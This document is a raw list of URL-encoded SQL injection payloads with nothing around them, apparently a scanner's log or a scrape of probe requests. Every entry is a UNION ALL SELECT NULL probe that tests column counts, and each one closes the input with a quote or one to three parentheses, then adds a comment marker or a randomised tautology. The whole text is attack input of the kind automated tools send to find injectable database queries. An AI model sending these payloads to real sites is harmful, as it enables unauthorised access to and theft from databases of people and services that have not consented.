1%22%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23 1%22%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23 1%22%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23 1%22%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23 1%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23%20AND%20%285072%3D5072 1%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23%20AND%20%285506%3D5506 1%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23%20AND%20%284031%3D4031 1%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23%20AND%20%281253%3D1253 1%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23%20AND%20%281213%3D1213 1%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23%20AND%20%287510%3D7510 1%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23%20AND%20%282234%3D2234 1%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23%20AND%20%285294%3D5294 1%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23%20AND%20%286821%3D6821 1%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23%20AND%20%282242%3D2242 1%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23%20AND%20%28%283946%3D3946 1%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23%20AND%20%28%285691%3D5691 1%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23%20AND%20%28%286426%3D6426 1%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23%20AND%20%28%286857%3D6857 1%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23%20AND%20%28%283358%3D3358 1%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23%20AND%20%28%284520%3D4520 1%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23%20AND%20%28%283248%3D3248 1%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23%20AND%20%28%289539%3D9539 1%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23%20AND%20%28%289874%3D9874 1%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23%20AND%20%28%283777%3D3777 1%29%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23%20AND%20%28%28%288468%3D8468 1%29%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23%20AND%20%28%28%282726%3D2726 1%29%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23%20AND%20%28%28%286641%3D6641 1%29%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23%20AND%20%28%28%284699%3D4699 1%29%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23%20AND%20%28%28%281234%3D1234 1%29%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23%20AND%20%28%28%285244%3D5244 1%29%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23%20AND%20%28%28%286071%3D6071 1%29%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23%20AND%20%28%28%283981%3D3981 1%29%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23%20AND%20%28%28%282227%3D2227 1%29%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23%20AND%20%28%28%289448%3D9448 1%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23 1%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23 1%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23 1%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23 1%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23 1%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23 1%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23 1%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23 1%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23 1%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23 1%27%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23%20AND%20%28%27MKtX%27%3D%27MKtX 1%27%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23%20AND%20%28%27kmGN%27%3D%27kmGN 1%27%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23%20AND%20%28%27WGBi%27%3D%27WGBi 1%27%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23%20AND%20%28%27BlNK%27%3D%27BlNK 1%27%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23%20AND%20%28%27hPhI%27%3D%27hPhI 1%27%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23%20AND%20%28%27GBgu%27%3D%27GBgu 1%27%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23%20AND%20%28%27LKhv%27%3D%27LKhv 1%27%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23%20AND%20%28%27OWEk%27%3D%27OWEk 1%27%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23%20AND%20%28%27pQBM%27%3D%27pQBM 1%27%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23%20AND%20%28%27wlpq%27%3D%27wlpq 1%27%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23%20AND%20%28%28%27fRsx%27%3D%27fRsx 1%27%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23%20AND%20%28%28%27oYNw%27%3D%27oYNw 1%27%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23%20AND%20%28%28%27BMxp%27%3D%27BMxp 1%27%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23%20AND%20%28%28%27XMsG%27%3D%27XMsG 1%27%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23%20AND%20%28%28%27AmWy%27%3D%27AmWy 1%27%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23%20AND%20%28%28%27wdzw%27%3D%27wdzw 1%27%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23%20AND%20%28%28%27plPM%27%3D%27plPM 1%27%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23%20AND%20%28%28%27lpdC%27%3D%27lpdC 